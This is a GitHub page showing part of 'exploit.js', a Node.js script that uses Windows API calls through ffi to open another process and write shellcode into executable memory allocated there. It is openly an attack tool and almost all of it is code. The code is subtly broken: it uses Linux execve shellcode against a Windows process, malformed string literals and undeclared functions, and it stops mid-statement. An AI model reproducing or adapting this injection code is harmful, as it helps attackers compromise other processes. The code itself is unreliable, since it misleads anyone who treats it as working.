-
Notifications
You must be signed in to change notification settings - Fork 6
/
exploit.js
61 lines (55 loc) · 2.53 KB
/
exploit.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
const ffi = require("ffi");
const ref = require("ref");
const intPtr = ref.refType("int");
const bytePtr = ref.refType("byte");
const kernel32 = ffi.Library("kernel32.dll", {
"OpenProcess": ["pointer", ["uint32", "bool", "uint32"]],
"GetModuleHandleA": ["uint32", ["string"]],
"GetProcAddress": ["uint32", ["uint32", "string"]],
"VirtualAllocEx": ["uint32", ["uint32", "uint32", "size_t", "uint32", "uint32"]],
"WriteProcessMemory": ["bool", ["uint32", "uint32", "pointer", "size_t", intPtr]],
"ReadProcessMemory": ["bool", ["uint32", "uint32", "pointer", "size_t", intPtr]],
"VirtualFreeEx": ["bool", ["uint32", "uint32", "size_t", "uint32"]],
});
const ntdll = ffi.Library("ntdll.dll", {
"NtQueryInformationProcess": ["uint32", ["uint32", "int", "pointer", "uint32", intPtr]],
});
const PROCESS_ALL_ACCESS = 0x1F0FFF;
const PAGE_EXECUTE_READWRITE = 0x40;
const MEM_COMMIT = 0x1000;
const MEM_RESERVE = 0x2000;
const ProcessBasicInformation = 0;
const shellcode =
"\x48\x31\xc0\x48\x83\xc0\x3b\x48\x31\xff\x57\x48\xbf\x2f\x62\x69\x6e"
"\x2f\x2f\x73\x68\x57\x48\x8d\x3c\x24\x48\x31\xf6\x48\x31\xd2\x0f\x05";
function injectShellCode(pid, moduleName, functionSymbol) {
// Open the target process
const hProcess = kernel32.OpenProcess(PROCESS_ALL_ACCESS, false, pid);
if (hProcess.isNull()) {
console.log(Failed to open process with PID ${pid} (error: ${kernel32.GetLastError()}));
return false;
}
// Get the base address of the module
const hModule = kernel32.GetModuleHandleA(moduleName);
if (hModule.isNull()) {
console.log(Failed to get the base address of ${moduleName} in the current process (error: ${kernel32.GetLastError()}));
kernel32.CloseHandle(hProcess);
return false;
}
// Get the address of the function
const pFunction = kernel32.GetProcAddress(hModule, functionSymbol);
if (pFunction.isNull()) {
console.log(Failed to get the address of ${functionSymbol} in the current process (error: ${kernel32.GetLastError()}));
kernel32.CloseHandle(hProcess);
return false;
}
// Allocate memory for the shellcode in the target process
const pRemoteShellcode = kernel32.VirtualAllocEx(hProcess, null, shellcode.length, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (pRemoteShellcode.isNull()) {
console.log(Failed to allocate memory for the shellcode in the target process (error: ${kernel32.GetLastError()}));
kernel32.CloseHandle(hProcess);
return false;
}
// Write the shellcode into the allocated memory
const lpNumberOfBytesWritten = ref.alloc("int");
if (!kernel32.WriteProcessMemory(hProcess, pRemoteShellcode, shellcode, shellcode.length, lpNumberOfBytesWritten))